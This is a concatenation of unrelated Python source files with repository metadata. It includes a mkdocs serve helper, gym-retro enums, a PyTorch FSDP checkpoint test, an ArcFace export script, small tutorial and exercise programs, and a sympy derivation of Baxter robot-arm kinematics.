#!/usr/bin/env python """ `doc serve` is a convenience tool which starts the live server together with doc pre_process (with working but changeable defaults) Note: You have to run this from the repo root of a checked out devapp project, which has a docs folder. """ from devapp.tools import FLG, exists from devapp.app import app, do, system, run_app import os, sys, json import time # ------------------------------------------------------------------------------ config from . import pre_process # import lit_prog_evaluation class Flags: autoshort = '' class lit_prog_evaluation(pre_process.Flags.lit_prog_evaluation): 'Example: re-evaluate only page config.md.lp: doc serve -lpe conf' d = 'md' class pre_proc: n = 'How to run doc pre_process' class port: n = 'mkdocs live server port. if the port is occupied (checked via netstat) we kill(!) the occupying other process' d = 8000 class only_kill: n = 'Action: Only kill server at port' d = False # ----------------------------------------------------------------------------- actions def kill_server(): p = FLG.port cmd = 'netstat -tanp | grep " LISTEN " | grep ":%s"' % p res = os.popen(cmd).read().strip().split() if not res: return app.warn('No server process was running at port', port=p) app.warn('Killing', proc=res) proc = res[-1].split('/', 1)[0] do(os.kill, int(proc), 9) app.warn('Server process at port killed', port=p) def start_server(): do(kill_server) cmd = 'mkdocs serve --livereload -a 127.0.0.1:%s &' % FLG.port do(system, cmd) def start_doc_preproc(): cmd = 'doc pre_process --lit_prog_evaluation=%s --lit_prog_evaluation_monitor=true' cmd = cmd % FLG.lit_prog_evaluation do(system, cmd) def run(): if FLG.only_kill: return do(kill_server) D = os.getcwd() if not exists(D + '/docs/'): app.die('You have to run doc serve within the repo root of a devapps checkout') do(start_server) p = FLG.port do(start_doc_preproc) main = lambda: run_app(run, flags=Flags)
26.7
123
0.606273
fb595e128f019ae4e13c45fab11da4f05a338717
1,016
py
Python
retro/enums.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
2,706
2018-04-05T18:28:50.000Z
2022-03-29T16:56:59.000Z
retro/enums.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
242
2018-04-05T22:30:42.000Z
2022-03-19T01:55:11.000Z
retro/enums.py
MatPoliquin/retro
c70c174a9818d1e97bc36e61abb4694d28fc68e1
[ "MIT-0", "MIT" ]
464
2018-04-05T19:10:34.000Z
2022-03-28T13:33:32.000Z
from enum import Enum


class State(Enum):
    """
    Special values for setting the restart state of the environment.

    You can also specify a string that is the name of the ``.state`` file
    """

    #: Start the game at the default savestate from ``metadata.json``
    DEFAULT = -1
    #: Start the game at the power on screen for the emulator
    NONE = 0


class Observations(Enum):
    """
    Different settings for the observation space of the environment
    """

    #: Use RGB image observations
    IMAGE = 0
    #: Use RAM observations where you can see the memory of the game instead of the screen
    RAM = 1


class Actions(Enum):
    """
    Different settings for the action space of the environment
    """

    #: MultiBinary action space with no filtered actions
    ALL = 0
    #: MultiBinary action space with invalid or not allowed actions filtered out
    FILTERED = 1
    #: Discrete action space for filtered actions
    DISCRETE = 2
    #: MultiDiscete action space for filtered actions
    MULTI_DISCRETE = 3
36.285714
99
0.695866
f766b23e2080d4363dc21b4a4bf6048e315bfffb
7,556
py
Python
test/distributed/fsdp/test_fsdp_checkpoint.py
vuanvin/pytorch
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
[ "Intel" ]
5
2018-04-24T13:41:12.000Z
2019-07-09T07:32:09.000Z
test/distributed/fsdp/test_fsdp_checkpoint.py
vuanvin/pytorch
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
[ "Intel" ]
14
2021-10-14T06:58:50.000Z
2021-12-17T11:51:07.000Z
test/distributed/fsdp/test_fsdp_checkpoint.py
vuanvin/pytorch
9267fd8d7395074001ad7cf2a8f28082dbff6b0b
[ "Intel" ]
7
2020-08-31T22:49:59.000Z
2020-09-15T14:29:07.000Z
# Owner(s): ["oncall: distributed"] import contextlib from copy import deepcopy from functools import partial import torch import torch.nn as nn from torch.distributed._fsdp.fully_sharded_data_parallel import ( FullyShardedDataParallel as FSDP, CPUOffload, ) from torch.distributed.algorithms._checkpoint._checkpoint_wrapper import ( checkpoint_wrapper, ) from torch.testing._internal.common_distributed import ( skip_if_lt_x_gpu, ) from torch.testing._internal.common_fsdp import ( FSDPTest, _maybe_wrap_fsdp, ) from torch.testing._internal.common_utils import ( run_tests, parametrize, instantiate_parametrized_tests, ) from torch.utils.checkpoint import checkpoint class TestFSDPCheckpoint(FSDPTest): class SequentialModule(nn.Module): def __init__( self, checkpoint_layer=False, offload_activations=False, wrap_fsdp=False, *fsdp_args, **fsdp_kwargs, ): torch.manual_seed(0) torch.cuda.manual_seed(0) super().__init__() l1 = nn.Linear(3, 3).cuda() l2 = nn.Linear(3, 3).cuda() l3 = nn.Linear(3, 3).cuda() if checkpoint_layer: ckpt_wrapper = partial( checkpoint_wrapper, offload_to_cpu=offload_activations ) l1 = ckpt_wrapper(l1) l2 = ckpt_wrapper(l2) l3 = ckpt_wrapper(l3) fsdp_wrapper = partial( _maybe_wrap_fsdp, wrap_fsdp=wrap_fsdp, *fsdp_args, **fsdp_kwargs ) self.ffn = nn.Sequential( fsdp_wrapper(l1), fsdp_wrapper(l2), fsdp_wrapper(l3), ) def forward(self, x): return self.ffn(x) def _verify_parity(self, losses, outputs, models): assert losses assert outputs assert models for (l, o) in zip(losses[1:], outputs[1:]): self.assertEqual(losses[0], l) self.assertEqual(outputs[0], o) # Verify grads ref_model = models[0] ref_grads = [p.grad for p in ref_model.parameters()] for m in models[1:]: grads = [p.grad for p in m.parameters()] for ref_g, g in zip(ref_grads, grads): self.assertEqual(ref_g, g) @skip_if_lt_x_gpu(2) @parametrize( "cpu_offload", [CPUOffload(offload_params=True), CPUOffload(offload_params=False)], ) @parametrize("offload_activations", [True, False]) def 
test_checkpoint_fsdp_wrapping(self, cpu_offload, offload_activations): # Test checkpoint(FSDP(layer1), FSDP(layer2), ....) ckpt_sequential_wrapped_fsdp = checkpoint_wrapper( TestFSDPCheckpoint.SequentialModule( wrap_fsdp=True, cpu_offload=cpu_offload ), offload_to_cpu=offload_activations, ) # Test FSDP(checkpoint(layer1)), FSDP(checkpoint(layer2)), .... inner_ckpt = TestFSDPCheckpoint.SequentialModule( checkpoint_layer=True, offload_activations=offload_activations, wrap_fsdp=True, cpu_offload=cpu_offload, ) baseline = TestFSDPCheckpoint.SequentialModule( wrap_fsdp=True, cpu_offload=cpu_offload ) # note that reentrant-based checkpointing requires inputs to have grad # flag set. inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True) models = [ckpt_sequential_wrapped_fsdp, inner_ckpt, baseline] offload_to_cpu_event = "Memcpy DtoH" for i in range(2): losses = [] outputs = [] for m in models: check_offload = m != baseline and i == 0 and offload_activations profiler_ctx = ( torch.profiler.profile(use_cuda=True) if check_offload else contextlib.suppress() ) with profiler_ctx as prof: out = m(inp) if check_offload: event_names = [event.name for event in prof.events()] offload_occured = any( offload_to_cpu_event in name for name in event_names ) self.assertTrue(offload_occured) loss = out.sum() loss.backward() losses.append(loss) outputs.append(out) self._verify_parity(losses, outputs, models) @skip_if_lt_x_gpu(2) @parametrize( "cpu_offload", [CPUOffload(offload_params=True), CPUOffload(offload_params=False)], ) @parametrize("offload_activations", [True, False]) def test_basic_checkpoint_end_to_end(self, cpu_offload, offload_activations): seq = TestFSDPCheckpoint.SequentialModule().to(torch.cuda.current_device()) # Runs FSDP with no checkpointing fsdp_only_seq = FSDP(deepcopy(seq), cpu_offload=cpu_offload) # Runs checkpoint-wrapped FSDP checkpointed_fsdp = checkpoint_wrapper( FSDP(deepcopy(seq), cpu_offload=cpu_offload), 
offload_to_cpu=offload_activations, ) # Runs FSDP-wrapped checkpointed module fsdp_wrapped_checkpoint = FSDP( checkpoint_wrapper(deepcopy(seq), offload_to_cpu=offload_activations), cpu_offload=cpu_offload, ) # Runs FSDP with manual calls to checkpoint. fsdp_call_checkpoint = FSDP(deepcopy(seq), cpu_offload=cpu_offload) # note that reentrant-based checkpointing requires inputs to have grad # flag set. inp = torch.randn(10, 3, device=torch.cuda.current_device(), requires_grad=True) models = [ fsdp_only_seq, checkpointed_fsdp, fsdp_wrapped_checkpoint, fsdp_call_checkpoint, ] offload_to_cpu_event = "Memcpy DtoH" for i in range(6): losses = [] outputs = [] for m in models: check_offload = m != fsdp_only_seq and i == 0 and offload_activations profiler_ctx = ( torch.profiler.profile(use_cuda=True) if check_offload else contextlib.suppress() ) with profiler_ctx as prof: if m == fsdp_call_checkpoint: offload_ctx = ( torch.autograd.graph.save_on_cpu(pin_memory=True) if offload_activations else contextlib.suppress() ) with offload_ctx: out = checkpoint(m, inp) else: out = m(inp) if check_offload: event_names = [event.name for event in prof.events()] offload_occured = any( offload_to_cpu_event in name for name in event_names ) self.assertTrue(offload_occured) loss = out.sum() loss.backward() losses.append(loss) outputs.append(out) self._verify_parity(losses, outputs, models) instantiate_parametrized_tests(TestFSDPCheckpoint) if __name__ == "__main__": run_tests()
34.190045
88
0.571731
f7913068c3042169ee6c413f8ef205e68a9963ab
2,716
py
Python
research/cv/arcface/modelarts/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
research/cv/arcface/modelarts/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
research/cv/arcface/modelarts/export.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""
python start.py
"""
import os
import glob
import argparse
import numpy as np
from mindspore import export
from mindspore import Tensor
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from src.iresnet import iresnet100

DATA_PATH = "/cache/data_path_"
CKPT_PATH = "/cache/ckpt/"

parser = argparse.ArgumentParser(description='Mindspore ImageNet Training')
parser.add_argument('--train_url', default='', type=str,
                    help='output path')
parser.add_argument('--data_url', default='', type=str)
# Datasets
parser.add_argument('--batch_size', default=1, type=int, metavar='N',
                    help='train batchsize (default: 256)')
# NOTE(review): argparse `type=bool` makes any non-empty string truthy
# (e.g. "--modelarts False" is True) — confirm this flag is only used
# with its default.
parser.add_argument('--modelarts', type=bool, default=True)
args = parser.parse_args()


def frozen_to_air(modelnet, modelargs):
    # Load checkpoint weights into `modelnet`, then export it in the format
    # given by modelargs (here AIR), traced with a zero dummy input of shape
    # [batch_size, 3, height, width].
    param_dict = load_checkpoint(modelargs.get("ckpt_file"))
    load_param_into_net(modelnet, param_dict)
    input_arr = Tensor(
        np.zeros([modelargs.get("batch_size"), 3, modelargs.get("height"), modelargs.get("width")], np.float32))
    export(modelnet, input_arr, file_name=modelargs.get("file_name"), file_format=modelargs.get("file_format"))


if __name__ == "__main__":
    # moxing is only available inside ModelArts, hence the local import.
    import moxing as mox
    if not os.path.exists(DATA_PATH):
        os.makedirs(DATA_PATH, 0o755)
    # Pull the training output (checkpoints) from OBS into the local cache.
    mox.file.copy_parallel(src_url=args.data_url, dst_url=CKPT_PATH)
    prefix = "ArcFace"
    ckpt_list = glob.glob(CKPT_PATH + prefix + "*.ckpt")
    if not ckpt_list:
        print("ckpt file not generated.")
    # NOTE(review): execution continues even when ckpt_list is empty, so
    # ckpt_list[-1] below would raise IndexError — confirm intent.
    # Pick the most recently written checkpoint.
    ckpt_list.sort(key=os.path.getmtime)
    ckpt_model = ckpt_list[-1]
    net = iresnet100()
    frozen_to_air_args = {'ckpt_file': ckpt_model,
                          'batch_size': args.batch_size,
                          'height': 112,
                          'width': 112,
                          'file_name': (CKPT_PATH + prefix),
                          'file_format': 'AIR'}
    frozen_to_air(net, frozen_to_air_args)
    if args.modelarts:
        # Push the exported model back to OBS.
        mox.file.copy_parallel(src_url=CKPT_PATH, dst_url=args.train_url)
36.213333
112
0.670471
540d424532ff9f498d7d0a5c8cc540f93970db70
713
py
Python
Python/pandas/01_series.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/pandas/01_series.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
Python/pandas/01_series.py
Kreijeck/learning
eaffee08e61f2a34e01eb8f9f04519aac633f48c
[ "MIT" ]
null
null
null
import pandas as pd import numpy as np data = [22, 33, 41, 12] index = ["A", "B", "C", "D"] s = pd.Series(data, name='Age', index=index) print(s) print(s["B"]) print(s[2]) data_dict = { "A": 28, "B": 42, "C": 1337, "D": 43, } # index kann gesetzt werden und ändert auch die Reihenfolge und werte können # wiederholt werden s2 = pd.Series(data_dict, index=["A", 'B', 'D', 'E', 'C', 'A']) print(s2) #unnützer datatype wird zurückgesetzt s3 = pd.Series(np.random.randn(10), dtype=np.int32) print(s3) s3 = pd.Series(np.random.randint(12, 25, 10), dtype=np.int32) print(s3) # Achtun slice: nicht möglich: s[1:3][0], da index beibehalten wird # Filtern print(s3[s3 < s3.mean()]) print(np.log(s3))
20.970588
76
0.632539
54a5a39aa2099d456ab0d02ac4fb47014ac0ba69
1,400
py
Python
Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
1
2021-08-16T14:52:05.000Z
2021-08-16T14:52:05.000Z
Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
null
null
null
Problems/Depth-First Search/easy/MinimumAbsoluteDifferenceBST/min_abs_dif_bst.py
dolong2110/Algorithm-By-Problems-Python
31ecc7367aaabdd2b0ac0af7f63ca5796d70c730
[ "MIT" ]
null
null
null
from typing import Optional


# Definition for a binary tree node.
class TreeNode:
    def __init__(self, val=0, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right


def getMinimumDifference(self, root: Optional[TreeNode]) -> int:
    """Minimum absolute difference between any two node values in a BST.

    An inorder walk of a BST yields values in ascending order, so the answer
    is the smallest gap between consecutive values of that walk.
    """
    values = []

    def inorder(node):
        # Left subtree, node, right subtree — ascending order for a BST.
        if node.left:
            inorder(node.left)
        values.append(node.val)
        if node.right:
            inorder(node.right)

    inorder(root)

    best = float('inf')
    for prev, cur in zip(values, values[1:]):
        best = min(best, cur - prev)
    return best
25.925926
69
0.601429
49c2612eb15938f0206a41d0a6921f4dfbb8879e
679
py
Python
IVTp/2014/TITOV_S_G/task_6_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTp/2014/TITOV_S_G/task_6_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
IVTp/2014/TITOV_S_G/task_6_22.py
YukkaSarasti/pythonintask
eadf4245abb65f4400a3bae30a4256b4658e009c
[ "Apache-2.0" ]
null
null
null
# Задача 6. Вариант 22. # Создайте игру, в которой компьютер загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать. # Titov S.G. # 11.04.2016 import random print ("Программа случайным образом загадывает имена двух братьев, легендарных основателей Рима, а игрок должен его угадать.") name_numbers = random.randint (1,2) if name_numbers == 1 : name = 'Ромул' elif name_numbers == 2 : name = 'Рем' answer = input ("Назовите одно из имен, легендарных основателей Рима: ") if answer == name: print ('\nВы угадали!') else : print ('\nВы не угадали!') print ('Правильный ответ:', name) input ("\nНажмите Enter для выхода.")
25.148148
126
0.705449
b72419d65127bf209e857f63197e4e47f112db09
1,198
py
Python
basics/lists.py
karinakozarova/Learning-Python
217dfc8ca6931a238445daf0b84e188c02916c52
[ "MIT" ]
1
2019-04-07T23:14:29.000Z
2019-04-07T23:14:29.000Z
basics/lists.py
karinakozarova/Learning-Python
217dfc8ca6931a238445daf0b84e188c02916c52
[ "MIT" ]
null
null
null
basics/lists.py
karinakozarova/Learning-Python
217dfc8ca6931a238445daf0b84e188c02916c52
[ "MIT" ]
null
null
null
from sys import stdin
import re

"""
The first line contains an integer, N, denoting the number of commands.
Each of the subsequent N lines contains one of the commands:
insert i e: Insert integer e at position i.
print: Print the list.
remove e: Delete the first occurrence of integer e.
append e: Insert integer e at the end of the list.
sort: Sort the list.
pop: Pop the last element from the list.
reverse: Reverse the list.
"""


def input_to_list(userinput):
    """Split a raw command line into words.

    Any non-word character (whitespace, punctuation, the trailing
    newline from ``stdin.readline``) is treated as a separator.
    """
    # Raw string: the original "[^\w]" relied on an invalid escape
    # sequence in a plain literal (DeprecationWarning, future error).
    return re.sub(r"[^\w]", " ", userinput).split()


if __name__ == '__main__':
    n = int(input())
    items = []  # renamed from `list`, which shadowed the builtin
    for _ in range(n):
        userinput = stdin.readline()
        words = input_to_list(userinput)
        # Same dispatch conditions as before: `insert` matches on the
        # first word, the others match anywhere in the raw line.
        if "insert" == words[0]:
            items.insert(int(words[1]), int(words[2]))
        elif "print" in userinput:
            print(items)
        elif "remove" in userinput:
            items.remove(int(words[1]))
        elif "append" in userinput:
            items.append(int(words[1]))
        elif "sort" in userinput:
            items.sort()
        elif "pop" in userinput:
            items.pop()
        elif "reverse" in userinput:
            items.reverse()
30.717949
71
0.605175
3fcb65dba04aa41adca62639fb1dc876d15cd06f
19,338
py
Python
misc/sympy_play/baxter_kinema_sympy.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
misc/sympy_play/baxter_kinema_sympy.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
misc/sympy_play/baxter_kinema_sympy.py
YoshimitsuMatsutaIe/hoge_flow_test
22e2e2ce043a3107bd06449f6f9958641293e414
[ "MIT" ]
null
null
null
"""baxterロボの同時変換行列などをsympyで式展開し整理 ・左腕のみ """ import sympy as sy import math from sympy.printing.pycode import pycode t_independent = False L, h, H = sy.symbols("L, h, H") L0, L1, L2, L3, L4, L5, L6 = sy.symbols("L0, L1, L2, L3, L4, L5, L6") if t_independent: q1, q2, q3, q4, q5, q6, q7 = sy.symbols("q1, q2, q3, q4, q5, q6, q7") c0 = sy.cos(sy.pi / 4) s0 = sy.sin(sy.pi / 4) c1 = sy.cos(q1) s1 = sy.sin(q1) c2 = sy.cos(q2) s2 = sy.sin(q2) c3 = sy.cos(q3) s3 = sy.sin(q3) c4 = sy.cos(q4) s4 = sy.sin(q4) c5 = sy.cos(q5) s5 = sy.sin(q5) c6 = sy.cos(q6) s6 = sy.sin(q6) c7 = sy.cos(q7) s7 = sy.sin(q7) # ジョイント角度ベクトル q = sy.Matrix([[q1, q2, q3, q4, q5, q6, q7]]).T if not t_independent: ### qを時間の関数にしたいとき ### t = sy.Symbol("t") c0 = sy.cos(sy.pi / 4) s0 = sy.sin(sy.pi / 4) q1 = sy.Function("q1") q2 = sy.Function("q2") q3 = sy.Function("q3") q4 = sy.Function("q4") q5 = sy.Function("q5") q6 = sy.Function("q6") q7 = sy.Function("q7") c1 = sy.cos(q1(t)) s1 = sy.sin(q1(t)) c2 = sy.cos(q2(t)) s2 = sy.sin(q2(t)) c3 = sy.cos(q3(t)) s3 = sy.sin(q3(t)) c4 = sy.cos(q4(t)) s4 = sy.sin(q4(t)) c5 = sy.cos(q5(t)) s5 = sy.sin(q5(t)) c6 = sy.cos(q6(t)) s6 = sy.sin(q6(t)) c7 = sy.cos(q7(t)) s7 = sy.sin(q7(t)) # ジョイント角度ベクトル q = sy.Matrix([[q1(t), q2(t), q3(t), q4(t), q5(t), q6(t), q7(t)]]).T # 同時変換行列 # 直書き # T_Wo_BL = sy.Matrix([[math.sqrt(2) / 2, math.sqrt(2) / 2, 0, L], # [-math.sqrt(2) / 2, math.sqrt(2) / 2, 0, -h], # [0, 0, 1, H], # [0, 0, 0, 1]]) # 直書きじゃない T_Wo_BL = sy.Matrix([[c0, s0, 0, L], [-s0, c0, 0, -h], [0, 0, 1, H], [0, 0, 0, 1]]) T_BL_0 = sy.Matrix([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, L0], [0, 0, 0, 1]]) T_0_1 = sy.Matrix([[c1, -s1, 0, 0], [s1, c1, 0, 0], [0, 0, 1, 0], [0, 0, 0, 1]]) T_1_2 = sy.Matrix([[-s2, -c2, 0, L1], [0, 0, 1, 0], [-c2, s2, 0, 0], [0, 0, 0, 1]]) T_2_3 = sy.Matrix([[c3, -s3, 0, 0], [0, 0, -1, -L2], [s3, c3, 0, 0], [0, 0, 0, 1]]) T_3_4 = sy.Matrix([[c4, -s4, 0, L3], [0, 0, 1, 0], [-s4, -c4, 0, 0], [0, 0, 0, 1]]) T_4_5 = sy.Matrix([[c5, -s5, 0, 0], [0, 0, -1, -L4], 
[s5, c5, 0, 0], [0, 0, 0, 1]]) T_5_6 = sy.Matrix([[c6, -s6, 0, L5], [0, 0, 1, 0], [-s6, -c6, 0, 0], [0, 0, 0, 1]]) T_6_7 = sy.Matrix([[c7, -s7, 0, 0], [0, 0, -1, 0], [s7, c7, 0, 0], [0, 0, 0, 1]]) T_7_GL = sy.Matrix([[1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 1, L6], [0, 0, 0, 1]]) T_0_7 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6 * T_6_7 T_0_6 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 * T_5_6 T_0_5 = T_0_1 * T_1_2 * T_2_3 * T_3_4 * T_4_5 T_0_4 = T_0_1 * T_1_2 * T_2_3 * T_3_4 T_0_3 = T_0_1 * T_1_2 * T_2_3 T_0_2 = T_0_1 * T_1_2 ## 正しい T_Wo_BL = T_Wo_BL T_Wo_0 = T_Wo_BL * T_BL_0 T_Wo_1 = T_Wo_BL * T_BL_0 * T_0_1 T_Wo_2 = T_Wo_BL * T_BL_0 * T_0_2 T_Wo_3 = T_Wo_BL * T_BL_0 * T_0_3 T_Wo_4 = T_Wo_BL * T_BL_0 * T_0_4 T_Wo_5 = T_Wo_BL * T_BL_0 * T_0_5 T_Wo_6 = T_Wo_BL * T_BL_0 * T_0_6 T_Wo_7 = T_Wo_BL * T_BL_0 * T_0_7 T_Wo_GL = T_Wo_BL * T_BL_0 * T_0_7 * T_7_GL T_Wo_i_ = [T_Wo_BL, T_Wo_0, T_Wo_1, T_Wo_2, T_Wo_3, T_Wo_4, T_Wo_5, T_Wo_6, T_Wo_7, T_Wo_GL] T_Wo_i = [sy.simplify(T) for T in T_Wo_i_] ### ヤコビ行列を計算 ### jacobi_alpha_x = [] jacobi_alpha_y = [] jacobi_alpha_z = [] jacobi_origin = [] for T in T_Wo_i: Jax = T[0:3, 0:1].jacobian(q) Jay = T[0:3, 1:2].jacobian(q) Jaz = T[0:3, 2:3].jacobian(q) Jo = T[0:3, 3:4].jacobian(q) jacobi_alpha_x.append(sy.simplify(Jax)) jacobi_alpha_y.append(sy.simplify(Jay)) jacobi_alpha_z.append(sy.simplify(Jaz)) jacobi_origin.append(sy.simplify(Jo)) if not t_independent: #qが時間依存のとき djacobi_alpha_x = [] djacobi_alpha_y = [] djacobi_alpha_z = [] djacobi_origin = [] for Jax, Jay, Jaz, Jo in zip(jacobi_alpha_x, jacobi_alpha_y, jacobi_alpha_z, jacobi_origin): dJax = sy.diff(Jax, t) dJay = sy.diff(Jay, t) dJaz = sy.diff(Jaz, t) dJo = sy.diff(Jo, t) dJs = [dJax, dJay, dJaz, dJo] dq1 ,dq2, dq3, dq4, dq5, dq6, dq7 = sy.symbols('dq1 ,dq2, dq3, dq4, dq5, dq6, dq7') for i, dJ in enumerate(dJs): dJs[i] = dJ.subs([ (sy.Derivative(q1(t), t), dq1), (sy.Derivative(q2(t), t), dq2), (sy.Derivative(q3(t), t), dq3), (sy.Derivative(q4(t), t), dq4), (sy.Derivative(q5(t), 
t), dq5), (sy.Derivative(q6(t), t), dq6), (sy.Derivative(q7(t), t), dq7), ]) djacobi_alpha_x.append(sy.simplify(dJax)) djacobi_alpha_y.append(sy.simplify(dJay)) djacobi_alpha_z.append(sy.simplify(dJaz)) djacobi_origin.append(sy.simplify(dJo)) # txt出力 # f = open('baxter_hoge.txt', 'w') # for i, T in enumerate(T_Wo_i): # s = '\nT' + str(i) + '=' # f.write(s) # f.write(pycode(T)) # for i, j in enumerate(jacobi_alpha_x): # s = '\njax' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # for i, j in enumerate(jacobi_alpha_y): # s = '\njay' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # for i, j in enumerate(jacobi_alpha_z): # s = '\njaz' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # for i, j in enumerate(jacobi_origin): # s = '\njo' + str(i) + '=' # f.write(s) # f.write(pycode(j)) # f.close() f = open('baxter_hoge_dt.txt', 'w') for i, j in enumerate(djacobi_alpha_x): s = '\ndjax' + str(i) + '=' f.write(s) f.write(pycode(j)) for i, j in enumerate(djacobi_alpha_y): s = '\ndjay' + str(i) + '=' f.write(s) f.write(pycode(j)) for i, j in enumerate(djacobi_alpha_z): s = '\ndjaz' + str(i) + '=' f.write(s) f.write(pycode(j)) for i, j in enumerate(djacobi_origin): s = '\ndjo' + str(i) + '=' f.write(s) f.write(pycode(j)) f.close() # # print("r_bar_Wo_BL = ", T_Wo_BL[0:3, 3:4]) # # print("r_bar_Wo_0 = ", T_Wo_0[0:3, 3:4]) # # print("r_bar_Wo_1 = ", T_Wo_1[0:3, 3:4]) # # print("r_bar_Wo_2 = ", T_Wo_2[0:3, 3:4]) # # print("r_bar_Wo_3 = ", T_Wo_3[0:3, 3:4]) # # print("r_bar_Wo_4 = ", T_Wo_4[0:3, 3:4]) # # print("r_bar_Wo_5 = ", T_Wo_5[0:3, 3:4]) # # print("r_bar_Wo_6 = ", T_Wo_6[0:3, 3:4]) # # print("r_bar_Wo_7 = ", T_Wo_7[0:3, 3:4]) # # print("r_bar_Wo_GL = ", T_Wo_GL[0:3, 3:4]) # #print("orig = ", T_Wo_GL[0:1, 3:4]) # #print("simp = ", sy.simplify(T_Wo_GL[0:1, 3:4])) # # 世界座標系から見た局所座標系の原点位置 # r_Wo_BL = T_Wo_BL[0:3, 3:4] # r_Wo_0 = T_Wo_0[0:3, 3:4] # r_Wo_1 = T_Wo_1[0:3, 3:4] # r_Wo_2 = T_Wo_2[0:3, 3:4] # r_Wo_3 = T_Wo_3[0:3, 3:4] # r_Wo_4 = T_Wo_4[0:3, 3:4] # r_Wo_5 = 
T_Wo_5[0:3, 3:4] # r_Wo_6 = T_Wo_6[0:3, 3:4] # r_Wo_7 = T_Wo_7[0:3, 3:4] # r_Wo_GL = T_Wo_GL[0:3, 3:4] # r_Wo_BL = sy.simplify(r_Wo_BL) # r_Wo_0 = sy.simplify(r_Wo_0) # r_Wo_1 = sy.simplify(r_Wo_1) # r_Wo_2 = sy.simplify(r_Wo_2) # r_Wo_3 = sy.simplify(r_Wo_3) # r_Wo_4 = sy.simplify(r_Wo_4) # r_Wo_5 = sy.simplify(r_Wo_5) # r_Wo_6 = sy.simplify(r_Wo_6) # r_Wo_7 = sy.simplify(r_Wo_7) # r_Wo_GL = sy.simplify(r_Wo_GL) # # print("BL = ", r_Wo_BL) # # print("0 = ", r_Wo_0) # # print("1 = ", r_Wo_1) # # print("2 = ", r_Wo_2) # # print("3 = ", r_Wo_3) # # print("4 = ", r_Wo_4) # # print("5 = ", r_Wo_5) # # print("6 = ", r_Wo_6) # # print("7 = ", r_Wo_7) # # print("GL = ", r_Wo_GL) # jacobi_r_Wo_BL = sy.simplify(r_Wo_BL.jacobian(q)) # jacobi_r_Wo_0 = sy.simplify(r_Wo_0.jacobian(q)) # jacobi_r_Wo_1 = sy.simplify(r_Wo_1.jacobian(q)) # jacobi_r_Wo_2 = sy.simplify(r_Wo_2.jacobian(q)) # jacobi_r_Wo_3 = sy.simplify(r_Wo_3.jacobian(q)) # jacobi_r_Wo_4 = sy.simplify(r_Wo_4.jacobian(q)) # jacobi_r_Wo_5 = sy.simplify(r_Wo_5.jacobian(q)) # jacobi_r_Wo_6 = sy.simplify(r_Wo_6.jacobian(q)) # jacobi_r_Wo_7 = sy.simplify(r_Wo_7.jacobian(q)) # jacobi_r_Wo_GL = sy.simplify(r_Wo_GL.jacobian(q)) # # print("BL = ", jacobi_r_Wo_BL) # # print("0 = ", jacobi_r_Wo_0) # # print("1 = ", jacobi_r_Wo_1) # # print("2 = ", jacobi_r_Wo_2) # # print("3 = ", jacobi_r_Wo_3) # # print("4 = ", jacobi_r_Wo_4) # # print("5 = ", jacobi_r_Wo_5) # # print("6 = ", jacobi_r_Wo_6) # # print("7 = ", jacobi_r_Wo_7) # # print("GL = ", jacobi_r_Wo_GL) # djacobi_BL = sy.diff(jacobi_r_Wo_BL, t) # djacobi_0 = sy.diff(jacobi_r_Wo_0, t) # djacobi_1 = sy.diff(jacobi_r_Wo_1, t) # djacobi_2 = sy.diff(jacobi_r_Wo_2, t) # djacobi_3 = sy.diff(jacobi_r_Wo_3, t) # djacobi_4 = sy.diff(jacobi_r_Wo_4, t) # djacobi_5 = sy.diff(jacobi_r_Wo_5, t) # 